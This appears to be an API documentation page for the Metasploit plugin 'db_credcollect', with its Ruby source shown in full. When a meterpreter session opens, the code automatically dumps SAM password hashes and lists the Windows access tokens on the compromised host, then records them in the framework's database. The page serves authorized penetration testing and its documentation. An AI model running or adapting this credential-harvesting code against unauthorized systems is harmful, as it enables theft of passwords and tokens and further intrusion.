Class: Msf::Plugin::CredCollect

Inherits:
Msf::Plugin show all
Includes:
SessionEvent
Defined in:
plugins/db_credcollect.rb

Defined Under Namespace

Classes: CredCollectCommandDispatcher

Instance Attribute Summary

Attributes inherited from Msf::Plugin

#opts

Attributes included from Framework::Offspring

#framework

Instance Method Summary collapse

Methods included from SessionEvent

#on_session_command, #on_session_download, #on_session_filedelete, #on_session_interact, #on_session_output, #on_session_upload

Methods inherited from Msf::Plugin

#add_console_dispatcher, create, #flush, #input, #output, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #remove_console_dispatcher

Constructor Details

#initialize(framework, opts) ⇒ CredCollect

Returns a new instance of CredCollect.


97
98
99
100
101
# File 'plugins/db_credcollect.rb', line 97

def initialize(framework, opts)
  super
  self.framework.events.add_session_subscriber(self)
  add_console_dispatcher(CredCollectCommandDispatcher)
end

Instance Method Details

#cleanupObject


103
104
105
106
# File 'plugins/db_credcollect.rb', line 103

def cleanup
  self.framework.events.remove_session_subscriber(self)
  remove_console_dispatcher('credcollect')
end

#descObject


112
113
114
# File 'plugins/db_credcollect.rb', line 112

def desc
  "Automatically grabs hashes and tokens from meterpreter session events and stores them in the db"
end

#nameObject


108
109
110
# File 'plugins/db_credcollect.rb', line 108

def name
  "db_credcollect"
end

#on_session_close(session, reason = '') ⇒ Object


94
95
# File 'plugins/db_credcollect.rb', line 94

def on_session_close(session,reason='')
end

#on_session_open(session) ⇒ Object


42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
# File 'plugins/db_credcollect.rb', line 42

def on_session_open(session)

  return if not self.framework.db.active

  print_status("This is CredCollect, I have the conn!")

  if (session.type == "meterpreter")

    # Make sure we're rockin Priv and Incognito
    session.core.use("priv")
    session.core.use("incognito")

    # It wasn't me mom! Stinko did it!
    hashes = session.priv.sam_hashes

    # Target infos for the db record
    addr = session.sock.peerhost
    # This ought to read from the exploit's datastore.
    # Use the meterpreter script if you need to control it.
    smb_port = 445

    # Record hashes to the running db instance
    hashes.each do |hash|
      data = {}
      data[:host]  = addr
      data[:port]  = smb_port
      data[:sname] = 'smb'
      data[:user]  = hash.user_name
      data[:pass]  = hash.lanman + ":" + hash.ntlm
      data[:type]  = "smb_hash"
      data[:active] = true

      self.framework.db.report_auth_info(data)
    end

    # Record user tokens
    tokens = session.incognito.incognito_list_tokens(0).values
    # Meh, tokens come to us as a formatted string
    tokens = tokens.join.strip!.split("\n")

    tokens.each do |token|
      data = {}
      data[:host]      = addr
      data[:type]      = 'smb_token'
      data[:data]      = token
      data[:update]    = :unique_data

      self.framework.db.report_note(data)
    end
  end
end